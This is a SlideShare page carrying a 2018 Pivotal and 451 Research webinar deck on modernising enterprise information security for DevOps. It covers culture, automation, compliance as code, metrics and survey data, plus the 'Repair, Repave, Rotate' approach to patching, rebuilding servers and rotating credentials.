Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

InfoSec: Evolve Thyself to Keep Pace in the Age of DevOps

VMware Tanzu
VMware Tanzu

Companies going through digital transformation initiatives need their IT organizations to support an increased business tempo. While DevOps practices have helped IT increase their pace to keep up with market dynamics, security teams still need to follow suit. InfoSec practitioners must modernize their practices to realize efficiencies in some of their most burdensome processes, like patching, credential management, and compliance. By embracing a ‘secure by default’ posture security teams can position themselves as enabling innovation rather than hindering it. Join Pivotal’s Justin Smith and guest speaker, Fernando Montenegro from 451 Research, in a conversation about how security can enable innovation while maintaining best security practices. They will examine best practices and cultural shifts that are required to be secure by default, as well as the role processes and platforms play in this transition. SPEAKERS: Guest Speaker: Fernando Montenegro, Senior Analyst, Information Security, 451 Research Justin Smith, Chief Security Officer for Product, Pivotal Jared Ruckle, Product Marketing Manager, Pivotal

Related slideshows

Pivotal Cloud Foundry 2.4: A First Look
Pivotal Cloud Foundry 2.4: A First LookPivotal Cloud Foundry 2.4: A First Look
Pivotal Cloud Foundry 2.4: A First Look
 
Tools and Recipes to Replatform Monolithic Apps to Modern Cloud Environments
Tools and Recipes to Replatform Monolithic Apps to Modern Cloud EnvironmentsTools and Recipes to Replatform Monolithic Apps to Modern Cloud Environments
Tools and Recipes to Replatform Monolithic Apps to Modern Cloud Environments
 
VMware Developer-Ready Transformation
VMware Developer-Ready TransformationVMware Developer-Ready Transformation
VMware Developer-Ready Transformation
 
1 of 26
Download to read offline
© Copyright 2018 Pivotal Software, Inc. All rights Reserved. Version 1.0 Justin Smith Pivotal @justinjsmith April 26, 2018 InfoSec: Evolve Thyself to Keep Pace in the Age of DevOps Fernando Montenegro 451 Research @fsmontenegro Jared Ruckle Pivotal @jaredruckle
Cover w/ Image Agenda ■  Security in the Enterprise ■  Security Transformation Framework ■  Culture ■  Automation ■  Lean Controls ■  Metrics ■  Q+A
Security in the enterprise.
InfoSec: Evolve Thyself to Keep Pace in the Age of DevOps
InfoSec: Evolve Thyself to Keep Pace in the Age of DevOps
Cover w/ Image
Cover w/ Image
Security is kinda similar.
Slow Enforcement ●  Not enough security team staffing ●  Enforcement stuck on a local maximum Project-based Mass Casualties ●  Team-based decisions and choice ●  Massive variation across the organization ●  Too many systems with poor compliance ●  Triage becomes the vital skill ●  Low morale ●  No-clear answer ●  Mundane, never-ending tasks Intractable The Typical Scenario
INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Budgets and Outlook 2017 Q5. Approximately, how is your organization’s total information security spending currently distributed across the following vendor based security tools today? Please sum to 100%. 40.0% 26.3% 19.6% 10.2% 3.9% 37.5% 29.4% 17.4% 8.9% 6.8% 35.9% 24.9% 20.0% 14.9% 4.3% Network security Endpoint security Security management Application security Other Percent of Sample 2015 Q4 (n=724) 2016 Q4 (n=401) 2017 Q4 (n=371) Information Security Spending Distribution Among Security Tools Information Security Respondents
You want speed & security.
It’s automatic. Security Transformation Framework Culture Automation Lean Controls It’s attractive. It’s valuable. It’s visible.Metrics
Build Prestige Shift away from domination and enforcement as primary tools. Collaborate and demonstrate value. ●  Security Inceptions with teams ●  Invest in external learning ●  Reserved use of the Big Stick Spread Awareness Create the ability to rotate people onto the security team for 2-3 months. It will change the organization. ●  Quarterly rotations ●  Lunch & Learns ●  Retros and stories Generalists & Specialists Mix domain knowledge and generalists. New graduates tend to have higher security awareness. ●  You gotta code ●  Build tools others want to use ●  Very little is rocket surgery Skills & Hiring Rotations & Education Reputation CONCEPTS CONCEPTS CONCEPTS Culture
INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Budgets and Outlook 2017 Q2. What are your top strategic security objectives for 2018? Please select up to 3. Top Strategic Security Objectives Information Security Respondents 34.5% 31.5% 24.2% 22.1% 21.5% 20.5% 19.4% 18.7% 18.7% 18.5% 15.3% 13.0% 11.2% 4.4% Implement or improve security monitoring Minimize the probability or impact of a possible data breach Improve network security Secure emerging architectures including the cloud Implement or improve security analytics Achieve regulatory compliance Improve application security Improve incident response Automate common security tasks Build (staff) the security team Integrate new endpoint security tools Raise the security team’s profile in the business Securing Internet of Things (IoT) devices Other Percent of Sample n = 562
App Scorecards Centralize scoring for applications, turn it into a game that attracts participation and best-practices. ●  Security.yaml in repos ●  Visible badging ●  Opt-in participation ●  Iterative scoring Build Service Brokers Automate onboarding and offboarding for accessing systems and API- specific tasks like AuthN/AuthZ & credentials. ●  Control connection points ●  Control credentials ●  Ensure visibility ●  Ensure consistency Tiered Scanning Dynamic, Static, Vulnerability, Logs, and Configuration assurance scanning can all be completely automated. ●  Control app stacks ●  CI/CD scanning ●  Ingestion Scanning ●  Logging alerts to SOC ●  Configuration Drift alerts CONCEPTS CONCEPTS CONCEPTS Automation
INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Vendor Evaluations 2017 Q6. How is usage of application security tools allocated across the following teams in your organization? Please sum to 100. 22.7% 17.5% 57.3% 2.5% 27.6% 19.9% 46.2% 6.2% 30.5% 16.6% 44.7% 8.1% Application Development Quality Assurance Information Security Other Mean percent Q3 2015 (n=181) Q3 2016 (n=256) Q3 2017 (n=159) Application Security Vendor Usage Allocation Respondents with application security in use or in pilot
Compliance as Code Inherit controls and compliance from the platform. Automate the documentation of controls and SSPs as part of team motion. ●  Explore Open-Control.org ●  Always-on, always current SSP ●  Expose as top-down controls Leverage the Platform Approach the platform as a way to gain radical control. Leverage all platform controls to inherit security in applications. ●  Re-use vs. build ●  Shorten the on-ramp ●  Internal marketing ATTACK-centric Focus on Adversarial Tactics, Techniques, and Common Knowledge. Use standards as a way to benchmark resilience. ●  Value-stream mapping ●  Start with the adversary ●  Describe threats and kill- chains CONCEPTS CONCEPTS CONCEPTS Lean Controls
INFORMATION SECURITY: WORKLOADS AND KEY PROJECTS 2017 INFORMATION SECURITY: WORKLOADS AND KEY PROJECTS 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Workloads and Key Projects 2017 Q10. What is your status of implementation for each of the following technologies? 88.6% 80.2% 76.0% 70.8% 70.6% 66.4% 55.7% 54.0% 49.6% 46.9% 44.1% 39.5% 33.0% 29.5% 29.1% 13.5% 5.8% 7.1% 6.0% 6.1% 9.8% 13.2% 8.0% 13.7% 7.0% 10.3% 9.3% 11.2% 4.1% 9.6% 9.2% 4.8% 4.0% 5.8% 8.9% 5.4% 7.2% 6.3% 4.5% 8.0% 5.8% 5.1% 4.8% 5.6% 4.4% 5.4% 5.8% 7.6% 4.9% 6.0% 8.4% 4.9% 4.8% 4.0% 8.1% 5.6% 11.6% 6.3% 10.0% 10.6% 9.7% 7.5% 11.7% 10.2% 7.7% 15.2% 26.1% 20.4% 34.9% 25.8% 35.3% 28.8% 52.1% 39.5% 53.2% Firewall (Including Next-Generation Firewall) (n = 599) Web Content Filtering (n = 586) Vulnerability Management (Scanning) (n = 588) Intrusion Detection/Prevention Systems (IDS/IPS) (n = 579) Encryption (n = 588) Information Security Awareness Training (n = 584) Multi-Factor Authentication (n = 574) Web Application Firewall (WAF) (n = 522) Mobile Device Management (MDM)/Enterprise Mobility Management (EMM) (n = 568) Anti-DDoS (Distributed Denial of Service) (n = 525) Computer Forensics/Incident Response (n = 542) Identity as a Service (IDaaS)/Single Sign-On (n = 550) Data Leakage Prevention (DLP) (n = 528) Managed Security Services Provider (MSSP) (n = 509) Threat Intelligence Platforms (n = 501) User Behavior Analytics (UBA) (n = 489) Percent of Sample In Use (Not Including Pilots) In Pilot/Proof of Concept Planning To Deploy in the Next 6 Months Planning To Deploy in the Next 6-12 Months Planning To Deploy in the Next 12-24 Months Not in Plan Status of Implementation Information Security Respondents
SOC Events Grow operational maturity by constantly improving the quality and types of notifications in the SOC. ●  Follows ATTACK concepts ●  Doesn’t matter where you start ●  Forces the right behaviors Usual Suspects Patching, vulnerabilities, # apps, # brokers, # DCs, # users, # FIDs, # certs, # domains, # security agents, team size, LOC, etc. ●  The basics still apply ●  Consider false-positives also ●  Reduce friction for adoption Emphasize Age Cluster, VM, container, brokers, credentials - they all have ages worth measuring and attempting to shorten. ●  Older is more fragile ●  Requires automation ●  Forces the right behaviors CONCEPTS CONCEPTS CONCEPTS Metrics
INFORMATION SECURITY: ORGANIZATIONAL DYNAMICS 2017 INFORMATION SECURITY: ORGANIZATIONAL DYNAMICS 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Organizational Dynamics 2017 Q44. Which of the following metrics does your organization use/track for information security staff? Please select all that apply. Metrics To Manage Security Information Security Respondents 53.0% 42.8% 44.9% 34.2% 34.4% 31.2% 32.4% 21.9% 2.2% 47.5% 39.0% 34.4% 34.2% 32.3% 29.2% 28.3% 21.9% 4.0% Security Incidents Resolved Tickets Resolved (e.g., ‘Trouble Tickets’) Audit Issues Resolved Application Availability (e.g., Uptime/ Downtime) Project Completion Time to Recovery/Restore from an Outage Lack of Data Breaches We Don’t Use Metrics Other Percent of Sample Q2 2016 (n=837) Q2 2017 (n=421)
It’s possible...
To be more secure and go faster
Repair Repair vulnerable software as soon as updates are available. Turnkey Compliance Repave Apps inherit controls from the platform, simplifying audits. Repave servers and applications from a known good state. Do this often. Rotate user credentials frequently, so they are only useful for short periods of time. Rotate Call to Action: Investigate Cloud Native Security Reduce Your MTTR | Resist Advanced Persistent Threats | Reduce the Threat of Leaked Credentials
Embedded OS (Windows & Linux) NSX-T CPI (15 methods) v1 v2 v3 ... CVEs Product Updates Java | .NET | NodeJS Pivotal Application Service (PAS) Application Code & Frameworks Buildpacks | Spring Boot | Spring Cloud | Steeltoe Elastic | Packaged Software | Spark Pivotal Container Service (PKS) >cf push >kubectl run vSphere Azure & Azure StackGoogle CloudAWSOpenstack Pivotal Network “3Rs” Github Concourse Concourse Pivotal Services Marketplace Pivotal and Partner Products Continuous delivery Public Cloud Services Customer Managed Services OpenServiceBrokerAPI Repair — CVEs Repave Rotate — Credhub
Thank You. Questions?
Transforming How The World Builds Software © Copyright 2018 Pivotal Software, Inc. All rights Reserved.

More Related Content

InfoSec: Evolve Thyself to Keep Pace in the Age of DevOps

  • 1. © Copyright 2018 Pivotal Software, Inc. All rights Reserved. Version 1.0 Justin Smith Pivotal @justinjsmith April 26, 2018 InfoSec: Evolve Thyself to Keep Pace in the Age of DevOps Fernando Montenegro 451 Research @fsmontenegro Jared Ruckle Pivotal @jaredruckle
  • 2. Cover w/ Image Agenda ■  Security in the Enterprise ■  Security Transformation Framework ■  Culture ■  Automation ■  Lean Controls ■  Metrics ■  Q+A
  • 3. Security in the enterprise.
  • 8. Security is kinda similar.
  • 9. Slow Enforcement ●  Not enough security team staffing ●  Enforcement stuck on a local maximum Project-based Mass Casualties ●  Team-based decisions and choice ●  Massive variation across the organization ●  Too many systems with poor compliance ●  Triage becomes the vital skill ●  Low morale ●  No-clear answer ●  Mundane, never-ending tasks Intractable The Typical Scenario
  • 10. INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Budgets and Outlook 2017 Q5. Approximately, how is your organization’s total information security spending currently distributed across the following vendor based security tools today? Please sum to 100%. 40.0% 26.3% 19.6% 10.2% 3.9% 37.5% 29.4% 17.4% 8.9% 6.8% 35.9% 24.9% 20.0% 14.9% 4.3% Network security Endpoint security Security management Application security Other Percent of Sample 2015 Q4 (n=724) 2016 Q4 (n=401) 2017 Q4 (n=371) Information Security Spending Distribution Among Security Tools Information Security Respondents
  • 11. You want speed & security.
  • 12. It’s automatic. Security Transformation Framework Culture Automation Lean Controls It’s attractive. It’s valuable. It’s visible.Metrics
  • 13. Build Prestige Shift away from domination and enforcement as primary tools. Collaborate and demonstrate value. ●  Security Inceptions with teams ●  Invest in external learning ●  Reserved use of the Big Stick Spread Awareness Create the ability to rotate people onto the security team for 2-3 months. It will change the organization. ●  Quarterly rotations ●  Lunch & Learns ●  Retros and stories Generalists & Specialists Mix domain knowledge and generalists. New graduates tend to have higher security awareness. ●  You gotta code ●  Build tools others want to use ●  Very little is rocket surgery Skills & Hiring Rotations & Education Reputation CONCEPTS CONCEPTS CONCEPTS Culture
  • 14. INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Budgets and Outlook 2017 Q2. What are your top strategic security objectives for 2018? Please select up to 3. Top Strategic Security Objectives Information Security Respondents 34.5% 31.5% 24.2% 22.1% 21.5% 20.5% 19.4% 18.7% 18.7% 18.5% 15.3% 13.0% 11.2% 4.4% Implement or improve security monitoring Minimize the probability or impact of a possible data breach Improve network security Secure emerging architectures including the cloud Implement or improve security analytics Achieve regulatory compliance Improve application security Improve incident response Automate common security tasks Build (staff) the security team Integrate new endpoint security tools Raise the security team’s profile in the business Securing Internet of Things (IoT) devices Other Percent of Sample n = 562
  • 15. App Scorecards Centralize scoring for applications, turn it into a game that attracts participation and best-practices. ●  Security.yaml in repos ●  Visible badging ●  Opt-in participation ●  Iterative scoring Build Service Brokers Automate onboarding and offboarding for accessing systems and API- specific tasks like AuthN/AuthZ & credentials. ●  Control connection points ●  Control credentials ●  Ensure visibility ●  Ensure consistency Tiered Scanning Dynamic, Static, Vulnerability, Logs, and Configuration assurance scanning can all be completely automated. ●  Control app stacks ●  CI/CD scanning ●  Ingestion Scanning ●  Logging alerts to SOC ●  Configuration Drift alerts CONCEPTS CONCEPTS CONCEPTS Automation
  • 16. INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Vendor Evaluations 2017 Q6. How is usage of application security tools allocated across the following teams in your organization? Please sum to 100. 22.7% 17.5% 57.3% 2.5% 27.6% 19.9% 46.2% 6.2% 30.5% 16.6% 44.7% 8.1% Application Development Quality Assurance Information Security Other Mean percent Q3 2015 (n=181) Q3 2016 (n=256) Q3 2017 (n=159) Application Security Vendor Usage Allocation Respondents with application security in use or in pilot
  • 17. Compliance as Code Inherit controls and compliance from the platform. Automate the documentation of controls and SSPs as part of team motion. ●  Explore Open-Control.org ●  Always-on, always current SSP ●  Expose as top-down controls Leverage the Platform Approach the platform as a way to gain radical control. Leverage all platform controls to inherit security in applications. ●  Re-use vs. build ●  Shorten the on-ramp ●  Internal marketing ATTACK-centric Focus on Adversarial Tactics, Techniques, and Common Knowledge. Use standards as a way to benchmark resilience. ●  Value-stream mapping ●  Start with the adversary ●  Describe threats and kill- chains CONCEPTS CONCEPTS CONCEPTS Lean Controls
  • 18. INFORMATION SECURITY: WORKLOADS AND KEY PROJECTS 2017 INFORMATION SECURITY: WORKLOADS AND KEY PROJECTS 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Workloads and Key Projects 2017 Q10. What is your status of implementation for each of the following technologies? 88.6% 80.2% 76.0% 70.8% 70.6% 66.4% 55.7% 54.0% 49.6% 46.9% 44.1% 39.5% 33.0% 29.5% 29.1% 13.5% 5.8% 7.1% 6.0% 6.1% 9.8% 13.2% 8.0% 13.7% 7.0% 10.3% 9.3% 11.2% 4.1% 9.6% 9.2% 4.8% 4.0% 5.8% 8.9% 5.4% 7.2% 6.3% 4.5% 8.0% 5.8% 5.1% 4.8% 5.6% 4.4% 5.4% 5.8% 7.6% 4.9% 6.0% 8.4% 4.9% 4.8% 4.0% 8.1% 5.6% 11.6% 6.3% 10.0% 10.6% 9.7% 7.5% 11.7% 10.2% 7.7% 15.2% 26.1% 20.4% 34.9% 25.8% 35.3% 28.8% 52.1% 39.5% 53.2% Firewall (Including Next-Generation Firewall) (n = 599) Web Content Filtering (n = 586) Vulnerability Management (Scanning) (n = 588) Intrusion Detection/Prevention Systems (IDS/IPS) (n = 579) Encryption (n = 588) Information Security Awareness Training (n = 584) Multi-Factor Authentication (n = 574) Web Application Firewall (WAF) (n = 522) Mobile Device Management (MDM)/Enterprise Mobility Management (EMM) (n = 568) Anti-DDoS (Distributed Denial of Service) (n = 525) Computer Forensics/Incident Response (n = 542) Identity as a Service (IDaaS)/Single Sign-On (n = 550) Data Leakage Prevention (DLP) (n = 528) Managed Security Services Provider (MSSP) (n = 509) Threat Intelligence Platforms (n = 501) User Behavior Analytics (UBA) (n = 489) Percent of Sample In Use (Not Including Pilots) In Pilot/Proof of Concept Planning To Deploy in the Next 6 Months Planning To Deploy in the Next 6-12 Months Planning To Deploy in the Next 12-24 Months Not in Plan Status of Implementation Information Security Respondents
  • 19. SOC Events Grow operational maturity by constantly improving the quality and types of notifications in the SOC. ●  Follows ATTACK concepts ●  Doesn’t matter where you start ●  Forces the right behaviors Usual Suspects Patching, vulnerabilities, # apps, # brokers, # DCs, # users, # FIDs, # certs, # domains, # security agents, team size, LOC, etc. ●  The basics still apply ●  Consider false-positives also ●  Reduce friction for adoption Emphasize Age Cluster, VM, container, brokers, credentials - they all have ages worth measuring and attempting to shorten. ●  Older is more fragile ●  Requires automation ●  Forces the right behaviors CONCEPTS CONCEPTS CONCEPTS Metrics
  • 20. INFORMATION SECURITY: ORGANIZATIONAL DYNAMICS 2017 INFORMATION SECURITY: ORGANIZATIONAL DYNAMICS 2017 Source: 451 Research, Voice of the Enterprise: Information Security, Organizational Dynamics 2017 Q44. Which of the following metrics does your organization use/track for information security staff? Please select all that apply. Metrics To Manage Security Information Security Respondents 53.0% 42.8% 44.9% 34.2% 34.4% 31.2% 32.4% 21.9% 2.2% 47.5% 39.0% 34.4% 34.2% 32.3% 29.2% 28.3% 21.9% 4.0% Security Incidents Resolved Tickets Resolved (e.g., ‘Trouble Tickets’) Audit Issues Resolved Application Availability (e.g., Uptime/ Downtime) Project Completion Time to Recovery/Restore from an Outage Lack of Data Breaches We Don’t Use Metrics Other Percent of Sample Q2 2016 (n=837) Q2 2017 (n=421)
  • 22. To be more secure and go faster
  • 23. Repair Repair vulnerable software as soon as updates are available. Turnkey Compliance Repave Apps inherit controls from the platform, simplifying audits. Repave servers and applications from a known good state. Do this often. Rotate user credentials frequently, so they are only useful for short periods of time. Rotate Call to Action: Investigate Cloud Native Security Reduce Your MTTR | Resist Advanced Persistent Threats | Reduce the Threat of Leaked Credentials
  • 24. Embedded OS (Windows & Linux) NSX-T CPI (15 methods) v1 v2 v3 ... CVEs Product Updates Java | .NET | NodeJS Pivotal Application Service (PAS) Application Code & Frameworks Buildpacks | Spring Boot | Spring Cloud | Steeltoe Elastic | Packaged Software | Spark Pivotal Container Service (PKS) >cf push >kubectl run vSphere Azure & Azure StackGoogle CloudAWSOpenstack Pivotal Network “3Rs” Github Concourse Concourse Pivotal Services Marketplace Pivotal and Partner Products Continuous delivery Public Cloud Services Customer Managed Services OpenServiceBrokerAPI Repair — CVEs Repave Rotate — Credhub
  • 26. Transforming How The World Builds Software © Copyright 2018 Pivotal Software, Inc. All rights Reserved.